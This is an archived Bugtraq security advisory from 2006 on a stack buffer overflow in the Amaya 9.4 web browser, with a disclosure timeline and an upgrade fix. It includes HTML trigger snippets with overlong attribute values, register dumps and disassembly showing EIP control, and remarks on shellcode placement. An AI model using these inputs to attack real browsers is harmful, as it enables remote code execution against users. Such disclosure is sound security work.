Home page logo

bugtraq logo Bugtraq mailing list archives

[BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4
From: bugtraq () morph3us org
Date: 12 Apr 2006 23:31:32 -0000

Hash: RIPEMD160

| BuHa Security-Advisory #10    |    Apr 12th, 2006 |
| Vendor   | W3C's Amaya                            |
| URL      | http://www.w3.org/Amaya/               |
| Version  | <= 9.4                                 |
| Risk     | Critical (Remote Code Execution)       |

o Description:

The current releases, Amaya 9.5, is available for Linux, Windows and
now MacOS X (see screenshot). It supports HTML 4.01, XHTML 1.0, XHTML
Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, many CSS 2 features, and
includes SVG support (transformation, transparency, and SMIL animation).

See the "Amaya Overview" page [1] for more details.

o Stack overflow:

Both of the two below posted code snippets (in fact there are dozens
of possible snippets but all of them trigger the same bug) force
Amaya 9.4 to crash:
<colgroup compact="Ax200">
<textarea rows="Ax200">

After the first glance at the generated error report and respectively
the ASM code during the access violation I thought I came across a
heap based buffer overflow.

eax=000000f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420
edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000  efl=00010206

        004edd61 03f3             add     esi,ebx
        004edd63 a4               movsb
        004edd64 8b4500           mov     eax,[ebp]
        004edd67 8b8c241c010000   mov     ecx,[esp+0x11c]
        004edd6e 8b942418010000   mov     edx,[esp+0x118]
        004edd75 50               push    eax
        004edd76 51               push    ecx
        004edd77 53               push    ebx
        004edd78 52               push    edx
        004edd79 e8a23c0200       call    amaya+0x111a20 (00511a20)
        004edd7e 53               push    ebx
        004edd7f e83cf90000       call    amaya+0xfd6c0 (004fd6c0)
        004edd84 83c428           add     esp,0x28
        004edd87 8bbc24fc000000   mov     edi,[esp+0xfc]
        004edd8e 8b942400010000   mov     edx,[esp+0x100]
FAULT ->004edd95 8b4240           mov     eax,[edx+0x40]
        004edd98 83f844           cmp     eax,0x44
        004edd9b 0f8527030000     jne     amaya+0xee0c8 (004ee0c8)
        004edda1 837c242457       cmp     dword ptr [esp+0x24],0x57
        004edda6 0f8465060000     je      amaya+0xee411 (004ee411)
        004eddac 8b4500           mov     eax,[ebp]
        004eddaf 8b8c2408010000   mov     ecx,[esp+0x108]
        004eddb6 6aff             push    0xff
        004eddb8 50               push    eax
        004eddb9 51               push    ecx
        004eddba 57               push    edi
        004eddbb e8d33af1ff       call    amaya+0x1893 (00401893)
        004eddc0 83c410           add     esp,0x10
        004eddc3 5f               pop     edi
        004eddc4 5e               pop     esi
        004eddc5 5d               pop     ebp

After a second, more precise look, the evitable heap overflow turned
out to be a stack based overflow..

We are able to control the EIP:
<textarea rows=

eax=00000001 ebx=00000000 ecx=77c10e72 edx=007bd472
esi=0000003e edi=00000000 eip=42424242 esp=0012ea38 ebp=00000000

Function: <nosymbols>
No prior disassembly possible
42424242 ?? ???
42424244 ?? ???
42424246 ?? ???
42424248 ?? ???
4242424a ?? ???
4242424c ?? ???


In fact, sucessful exploitation of this vulnerability is not that easy
because non-text characters were modfified during parsing therefore you
have to find a place where to place the shellcode. Naturally you have
to avoid null bytes too because Amaya would stop parsing the attribute
value and the overflow would not get triggered.

o Disclosure Timeline:

21 Dec 05 - Vulnerability discovered.
21 Feb 06 - Vendor contacted.
23 Feb 06 - Vendor confirmed vulnerability.
08 Mar 06 - Vendor fixed vulnerability.
12 Apr 06 - Public release.

o Solution:

Upgrade to the latest version of Amaya. [2]

o Credits:

Thomas Waldegger <bugtraq () morph3us org>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq () morph3us org' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.

Advisory online:

[1] http://www.w3.org/Amaya/Amaya.html
[2] http://www.w3.org/Amaya/User/BinDist.html

Version: n/a
Comment: http://morph3us.org/


  By Date           By Thread  

Current thread:
  • [BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4 bugtraq (Apr 14)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]